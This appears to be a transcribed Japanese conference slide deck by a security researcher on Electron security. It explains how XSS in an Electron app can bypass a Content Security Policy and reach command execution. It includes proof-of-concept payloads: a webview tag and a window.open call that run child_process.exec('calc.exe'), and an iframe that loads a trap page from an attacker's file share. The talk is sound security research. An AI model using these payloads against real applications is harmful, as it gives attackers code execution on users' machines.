自 己 紹 介 はせがわようすけ @hasegawayosuke ( 株 )セキュアスカイ テクノロジー 常 勤 技 術 顧 問 OWASP Kansaiチャプターリーダー OWASP Japanボードメンバー http//utf-8.jp/

Similar documents
Yosuke Secure Sky Technology Inc. Technical Advisor OWASP Kansai Chapter Leader OWASP Japan Chapter board member CODE BLUE Re

自己紹介 長谷川陽介 ( はせがわようすけ ( 株 ) セキュアスカイ テクノロジー常勤技術顧問 セキュリティキャンプ講師 (2008 年 ~) OWASP Kansai チャプターリーダー OWASP Japan ボードメンバー CODE BLUE カンファレ

医 療 費 自 己 負 担 額 支 払 明 細 書 入 力 シート - 目 次 - < 第 1 章 > 共 通 事 項 説 明 医 療 費 自 己 負 担 額 支 払 明 細 書 入 力 シート 目 次 1.1 本 システムの 注 意 点 入 力 項 目 について 基 本 情

untitled

目 次 1. 概 要 2.サーバーへの 設 置 3. 設 定 4.ユーザーアクセス 記 録 の 収 集 5. 制 限 解 除 キー 6. 利 用 規 定 7. 更 新 履 歴

自 己 紹 介 企 業 組 織 のネットワークにセキュリティー 機 器 を 配 置 発 生 するアラートをSOCへ 集 約 アラートをSOCが 分 析 し 必 要 に 応 じてお 客 様 へご 連 絡 対 応 を 助 言 お 客 様 ネットワーク Security Operation Center

<4D F736F F D20819C486F70658F6F93588ED297708AC7979D89E696CA837D836A B E A2E646F63>

研究者総覧システム

SPARQL Finder設置方法

Ver 改 訂 日 付 改 訂 内 容 1

ファイルサーバー(NFS) 構築ガイド

スライド 1

PowerPoint プレゼンテーション

Microsoft Word - 生物学技研報告ONLINE ガイドブック.doc

変 更 履 歴 版 日 付 区 分 変 更 内 容 変 更 個 所 /11/30 新 規 初 版 作 成 /12/10 修 正 資 料 カバー 画 像 設 定 の 操 作 内 容 を 追 加 資 料 カバー 画 像 設 定 i

■新聞記事

2

工 事 名 沢 口 浄 配 水 場 建 設 工 事 ( 浄 水 管 理 棟 ) 入 札 スケジュール 手 続 等 期 間 期 日 期 限 等 手 続 きの 方 法 等 平 成 24 年 5 月 8 日 ( 火 ) 正 午 から 1 設 計 図 書 等 の 閲 覧 貸 出 基 本 事 項 2のとおり

PowerPoint プレゼンテーション

工 事 名 能 代 南 中 学 校 体 育 館 非 構 造 部 材 耐 震 改 修 工 事 ( 建 築 主 体 工 事 ) 入 札 スケジュール 手 続 等 期 間 期 日 期 限 等 手 続 きの 方 法 等 1 設 計 図 書 等 の 閲 覧 貸 出 平 成 28 年 5 月 24 日 ( 火

SchITコモンズ【活用編】

Microsoft Word - 新ユーザー専用ページ機能詳細・マニュアル.doc

スライド 1

工 事 名 渟 城 西 小 学 校 体 育 館 非 構 造 部 材 耐 震 改 修 工 事 ( 建 築 主 体 工 事 ) 入 札 スケジュール 手 続 等 期 間 期 日 期 限 等 手 続 きの 方 法 等 1 設 計 図 書 等 の 閲 覧 貸 出 平 成 28 年 2 月 23 日 ( 火

1. 目 次 1. 目 次 2.はじめに 2-1.メールテンプレート 編 集 機 能 とは? 2-2. 対 象 読 者 3. 用 語 一 覧 4. 利 用 の 流 れ 4-1.メールテンプレート 編 集 の 流 れ 5. 機 能 説 明 利 用 方 法 5-1.テキストメール 編 集 開 封 率 を

Microsoft Word - manage_manual.doc

< 目 次 > 8. 雇 用 保 険 高 年 齢 雇 用 継 続 給 付 27 ( 育 児 休 業 給 付 介 護 休 業 給 付 ) 8.1 高 年 齢 雇 用 継 続 給 付 画 面 のマイナンバー 設 定 高 年 齢 雇 用 継 続 給 付 の 電 子 申 請 高

Microsoft PowerPoint - SCkenkyukai2012tanaka.mshr.ppt [互換モード]

「はぴeみる電」をご利用するにあたって

1.セッション3では 流 出 した 際 の 損 害 を 最 小 限 に 抑 える 対 応 仕 組 み 1

Office 10 パッケージ版「リンク集」

目 次 1. 積 算 内 訳 書 に 関 する 留 意 事 項 1 ページ 2. 積 算 内 訳 書 のダウンロード 3 ページ 3. 積 算 内 訳 書 の 作 成 (Excel 2003の 場 合 ) 6 ページ 4. 積 算 内 訳 書 の 作 成 (Excel 2007の 場 合 ) 13

(Microsoft Word - Easy\203y\201[\203W\221\200\215\354\203K\203C\203h.doc)

No.28

Microsoft Word - PORTAガイド(教員用)v.3.doc

目 次 1. はじめに Cform をサーバーにアップロードする カレンダー 予 約 システムを 表 示 する... 6 直 接 表 示 の 場 合... 6 Javascript での 埋 め 込 み 表 示... 7 Iframe での 埋 め 込 み 表 示..

スライド 1

Ⅰ 校 外 における 研 修 の 留 意 点 1 校 外 における 研 修 のコマ 数 の 考 え ア) 午 前 午 後 の 講 座 は 0.5 日 (0.5 コマ) イ) 全 日 の 講 座 は 1.0 日 (1.0 コマ) 2 校 外 における 研 修 として 選 択 できない 講 座 研 修

G01 メニュー 画 面 の 説 明 1 前 年 度 のデータ または 会 員 管 理 DBからの 会 員 情 報 データをインポートする [ 前 年 度 一 括 申 告 データインポート] ソフト1の 講 習 会 等 名 簿 ソフトデータにデータ 付 加 するた めに 日 本 医 師 会 より 配

付 録 B Wiki を 閲 覧 編 集 する B.1 Wiki を 閲 覧 する Web ブラウザのアドレス 欄 に 公 開 されている 個 人 用 Wiki の URL またはメーリ ングリストの Wiki の URL を 入 力 すると その Wiki を 閲 覧 編 集 することができ ます

目 次 1. Web メールのご 利 用 について Web メール 画 面 のフロー 図 Web メールへのアクセス ログイン 画 面 ログイン 後 (メール 一 覧 画 面 ) 画 面 共 通 項 目

REALV5_A4…p_Ł\1_4A_OCF

untitled

「都市から地方への人材誘致・移住促進に関する調査」

<91498EE88CA D815B2E786C73>

〔 大 会 役 員 〕

橡本体資料+参考条文.PDF

Lecture on

請 求 データを 作 成 しましょう 操 作 手 順 1 トップページ 画 面 で [ 口 座 振 替 請 求 ]をクリックして 口 座 振 替 請 求 サービスのメインメニュー 画 面 を 表 示 し [ 請 求 データ 作 成 ]をクリックします 請 求 データは 最 大 10 個 作 成 する

Microsoft PowerPoint - A07回目②.pptx

治 験 実 施 管 理 システム NMGCP 向 け Excel 形 式 プロトコール 作 成 手 順 書 V4.0.3 対 応 版 第 1 版 株 式 会 社 富 士 通 アドバンストエンジニアリング All Rights Reserved,Copyright 株 式 会 社 富 士 通 アドバン

平成28年度留学生給与等給付システムの取扱いについて


研究者情報データベース

PDF閲覧制限システムLight版体験版マニュアル

大見出し

■コンテンツ

GMO MobileHomePage

PowerPoint プレゼンテーション

目 次 1. 概 要 2.サーバーへの 設 置 3. 設 定 4. 利 用 規 定 5. 更 新 履 歴

目 次 1. 大 学 情 報 データベースシステムの 使 用 方 法 について EXCEL 一 括 登 録 EXCEL ダウンロード 検 索 条 件 の 指 定 プレビュー EXCEL ダウンロード(データ 抽 出 あ

C.1 共 有 フォルダ 接 続 操 作 の 概 要 アクセスが 許 可 されている 研 究 データ 交 換 システムの 個 人 用 共 有 フォルダまたは メーリングリストの 共 有 フォルダに 接 続 して フォルダを 作 成 したり ファイル をアップロードまたはダウンロードしたりすることがで

<4D F736F F F696E74202D E A B D682CC91E3955C93498D558C822E707074>

自己紹介 はせがわようすけ ネットエージェント株式会社 株式会社セキュアスカイ テクノロジー技術顧問 OWASP Kansai Chapter Leader OWASP Japan Chapter Advisory Board member

PowerPoint プレゼンテーション

文科省様式3-2集計オプションマニュアル

(Microsoft PowerPoint \213\306\213\226\211\302\215X\220V\220\340\226\276\211\357\201i3\201j)

工事記録写真チェックシステム 操作説明書

F-Secure Anti-Virus for Mac 2014

file:///L|/kajo/_RESOURCE/index.html

大阪府看護研究学会

ホワイトワークスタイルの ご提案

itutor (Windows Vista, 8, 8, 8.1 ) 製 品 紹 介 や 操 作 順 の PC 操 作 システム 運 順 の マニュアル 動 画 教 育 効 果 の い eラーニング 教 材 時 間 をかけず 簡 単 に 作 成 できる 2

サイボウズ Office 6.5 ユーザー操作マニュアル

スライド 1

PowerPoint プレゼンテーション

Microsoft Word - 修正_作業手順書.docx

■ディレクトリ

動 的 コンテンツは 大 きく 次 の 二 つに 分 類 されます (1) Web ブラウザからの 要 求 に 応 じて Web サーバでプログラムが 実 行 され 実 行 結 果 生 成 された Web コンテンツを Web ブラウザに 送 信 し 表 示 する 方 法 ( 例 :Perl C 言

5-2 一 般 ユーザー 用 :メール 2 送 信 者 のリンクをクリックすると 受 信 メールの 内 容 を 見 ることができます 受 信 メール 内 容 画 面 項 目 送 信 者 宛 先 CC 本 文 (テキスト) 本 文 (HTML) メールアドレスのリンクをクリックするとアドレス 帳 へ

ファイル 管 理 ツール デザイン 設 定 >> ファイル 管 理 でカートにアップロードされているファイルを 管 理 できます この 画 面 ではファイルの 確 認 / 移 動 / 削 除 が 可 能 です ファイルのアップロードはできません 2

 

マンションの管理委託契約に係る標準管理委託契約書について

目 次 1. 物 件 入 力 とページ 作 成 1.1. ドリームXジグソーの 一 覧 画 面 の 見 方 基 本 情 報 画 像 登 録 地 図 情 報 SEO 対 策 非 公 開 情 報

Microsoft Word - 30-PDFガイド.doc

Active! mail のプログラムとマニュアルは 著 作 権 法 で 保 護 された 著 作 物 で その 全 部 または 一 部 を 許 可 なく 複 製 したり 複 製 物 を 配 布 したり あるいは 他 のコンピュータ 用 に 変 換 したり 他 の 言 語 に 翻 訳 すると 著 作

CENTNET 導 入 の 手 引 き 変 更 履 歴 No. 変 更 日 変 更 番 号 変 更 枚 数 備 考 /07/ 版 発 行 - システムリプレースにより 全 面 刷 新 //07/ 版 発 行 3 誤 字 等 の 修 正 /

目 次 1.はじめに 書 式 の 説 明 表 紙 スケジュール 組 入 れ 基 準 併 用 禁 止 薬 併 用 注 意 薬 同 種 同 効 薬 医 師 モニタリング..

<4D F736F F D20819C B78AFA95DB91538C7689E68DEC90AC289

k_setumeikai_siryo

SNSとLMSの強みと弱み 統合環境を目指して (教育学部紀要投稿用)

ココが 変 わる2 理 数 教 育 の 強 化 こうした 前 倒 し 実 施 は 特 に 理 数 科 目 において 行 われる 先 に 解 の 公 式 を 例 に 出 したが 代 表 的 な 3 割 カット 上 位 学 年 への 移 行 または 削 除 内 容 には 以 下 のようなものがある 小

<4D F736F F F696E74202D C90BF8F CC8DEC90AC97E181698A4F8D E8816A5F56322E707074>

技術報告会原稿フォーマット

2010年10月19日

表 示 箇 所 設 定 場 所 画 像 名 デフォルト 画 像 テーマカラー 必 要 可 否 デバイス サイズ( 幅 高 さ ) 形 式 容 量 備 考 H 質 問 内 容 1~ 必 須 - - 最 大 5000 文 字 質 問 の 内 容 になります 選 択 肢 なし - テキスト 型

Active! mail のプログラムとマニュアルは 著 作 権 法 で 保 護 された 著 作 物 で その 全 部 または 一 部 を 許 可 なく 複 製 したり 複 製 物 を 配 布 したり あるいは 他 のコンピュータ 用 に 変 換 したり 他 の 言 語 に 翻 訳 すると 著 作

[1]メッセージ

エ シラバスの 公 開 サイトはレスポンシブ 対 応 ( 様 々な 種 類 の 機 器 や 画 面 サイズに 単 一 のファイルで 対 応 )しているこ オ 教 員, 職 員 の 利 用 グループを 作 成 し,グループ 毎 に 予 め 設 定 した 権 限 ( 利 用 メニューやマスタメンテナンス

研 究 開 発 に 係 る 技 術 情 報 源 の 一 つに 学 会 の 研 究 会 資 料 があります 同 じような 研 究 を 行 っている 研 究 者 や その 技 術 の 利 用 に 関 心 を 持 つ 技 術 者 などが 集 まって 情 報 交 換 を 行 う ものです 研 究 会 で 紹

Transcription:

Electronのはなし はせがわようすけ http://utf-8.jp/

自 己 紹 介 はせがわようすけ @hasegawayosuke ( 株 )セキュアスカイ テクノロジー 常 勤 技 術 顧 問 OWASP Kansaiチャプターリーダー OWASP Japanボードメンバー http//utf-8.jp/

宣 伝 : 本 が 出 ました

ブラウザハック Wade Alcorn Christian Frichot Michele Orrù 著 園 田 道 夫 西 村 宗 晃 はせがわ ようすけ 監 修 http://www.shoeisha.co.jp/ book/detail/9784798143439

ブラウザハック 書 籍 内 日 本 人 で 唯 一 のバイネームな 記 述

ブラウザハック 書 籍 内 日 本 人 で 唯 一 のバイネームな 記 述 監 修 者 まえがき 特 に 原 稿 が 遅 いはせがわ ようすけさんにはハラハラさ せられました ( Д`;)

ブラウザハック 書 籍 内 日 本 人 で 唯 一 のバイネームな 記 述 監 修 者 まえがき 特 に 原 稿 が 遅 いはせがわ ようすけさんにはハラハラさ せられました 2009 年 に 日 本 のセキュリ ティ 研 究 家 のはせがわよう すけが [],$_+:~{}とその 他 わずかの のみで JavaScriptコードを v(*'ω'*)v

今 日 の 話

Electronのセキュリティの 話 詳 しい 話 はこのあたりを 見 てください http://utf-8.jp/public/2016/0307/electron.pdf

Electronの 倒 し 方 - #html5jplat https://codeiq.jp/magazine/2016/03/38961/

Electronの 倒 し 方 - #html5jplat 最 後 にはせがわ 氏 は webviewタグ webframeapiなど 今 回 触 れなかったElectron 固 有 の 注 意 点 については 3 月 28 日 に 開 催 するShibuya.XSSで 説 明 する と 語 り

しません><

今 日 の 話 題 その1. Electron vs CSP その2. Electronのnodeモジュール 探 索 パス

その1 Electron vs CSP

ElectronへのCSPの 適 用 レンダラにCSPを 適 用 <meta http-equiv="content-security-policy" content="default-src 'self'"> CSPが 指 定 されてもwebviewタグ 内 では 自 由 にスクリプトが 実 行 可 能 <webview nodeintegration src="data:text/html, <script> require('child_process').exec('calc.exe', ()=>{}) </script> "></webview> CSPではXSSの 緩 和 にならない http://utf-8.jp/public/2016/0307/electron.pdf

ElectronへのCSPの 適 用 webviewタグを 使 わずどこまで 攻 撃 できるのか XSSはあるがCSPは 適 用 されている // main.js app.on('ready', ()=>{ mainwindow = new BrowserWindow({width: 600, height: 400} ); mainwindow.loadurl( `file://${ dirname}/index.html` );... <meta http-equiv="content-security-policy" content="default-src 'self'"> <script src="index.js"></script> // index.js document.queryselector("#msg").innerhtml = xss_source; //XSS!

ElectronへのCSPの 適 用 レンダラ 内 は 同 一 オリジン 以 外 のリソースは 禁 止 <meta http-equiv="content-security-policy" content="default-src 'self'"> <script src="index.js"></script> // index.js document.queryselector("#msg").innerhtml = xss_source; //XSS! <script src="http://example.jp/evil.js"></script> 発 火 しない <img src=# onload=alert(1)> CSPでブロック <iframe src="http://example.jp/"></iframe> CSPでブロック <iframe src="file.html"></iframe> 表 示 される iframe 内 のスクリプトも 動 作

ElectronへのCSPの 適 用 iframeの 埋 め 込 みは 可 能! <meta http-equiv="content-security-policy" content="default-src 'self'"> <script src="index.js"></script> // index.js document.queryselector("#msg").innerhtml = xss_source; //XSS! <iframe src="file.html"></iframe> <!-- file.html 内 --> <script>console.log(1);</script> iframe 内 で 実 行 される

ElectronへのCSPの 適 用 CSPが 適 用 されているがXSSがあるアプリ src=http://なiframeは 埋 め 込 み 不 可 src=file://なiframeの 埋 め 込 みが 可 能 iframe 内 のJavaScriptは 動 作 する CSPが 適 用 された 通 常 どおりの 動 作 file://なhtml 内 に 悪 意 のあるコードを 埋 め 込 め ば 攻 略 できるのでは!

ElectronへのCSPの 適 用 file://なhtml 内 に 悪 意 のあるコードを 埋 め 込 め ば 攻 略 できるのでは! そもそも 同 一 オリジン はどこ? // main.js app.on('ready', ()=>{ mainwindow = new BrowserWindow({width: 600, height: 400} ); mainwindow.loadurl( `file://${ dirname}/index.html` );... ディレクトリ 関 係 なく 全 ファイルが 同 一 オリジン console.log( location.origin ); // => "file://"

ElectronへのCSPの 適 用 file://なhtml 内 に 悪 意 のあるコードを 埋 め 込 め ば 攻 略 できるのでは! Electronアプリの 外 側 でもいい 任 意 のフォルダ file://スキームで 罠 ファイルを 用 意 する 方 法 事 前 に 悪 意 のあるファイルをダウンロードさせる? ダウンロード 先 フォルダを 攻 撃 者 は 知 る 必 要 があ る Electron 他 アプリ 等 でeval(xhr.responseText) みたいな 任 意 コードできるHTMLがないか 探 す さすがに 簡 単 には 見 当 たらない

ElectronへのCSPの 適 用 file://スキームで 罠 ファイルを 用 意 する 方 法 ファイルサーバ(CIFS or WebDAV)を 立 ち 上 げて file://file-server/share/trap.html みたいなファイルを 用 意 すればいい! <meta http-equiv="content-security-policy" content="default-src 'self'"> <iframe src="file://server/share/trap.html"></iframe>

ElectronへのCSPの 適 用 罠 HTMLファイル 内 のコード そのままではnode.jsの 機 能 が 使 えない 任 意 コード 実 行 とまで 言 えない typeof require; // => "undefined" nodeを 有 効 にしてwindowを 開 きなおす <script> window.open(`data:text/html, <script> require('child_process').exec('calc.exe',()=>{}) < /script>`, "","nodeintegration=1") </script>

ElectronへのCSPの 適 用 :まとめ CSPでdefault-src 'self'が 効 いていても 任 意 フォルダのfile:スキームなコンテンツが 読 める ファイルサーバ 上 のコンテンツも 読 める ファイルサーバに 罠 コンテンツを 用 意 し <iframe>をインジェクトすることで 任 意 コード 実 行 が 可 能 結 論 : CSPが 指 定 されていてもXSSがあれば webviewタグを 使 わなくても 任 意 コード 実 行 が 可 能

Electronのnodeモジュール 探 索 パス

検 閲 により 削 除

質 問? hasegawa@utf-8.jp @hasegawayosuke http://utf-8.jp/

2024 © docsplayer.net プライバシー | 利用規約 | フィードバック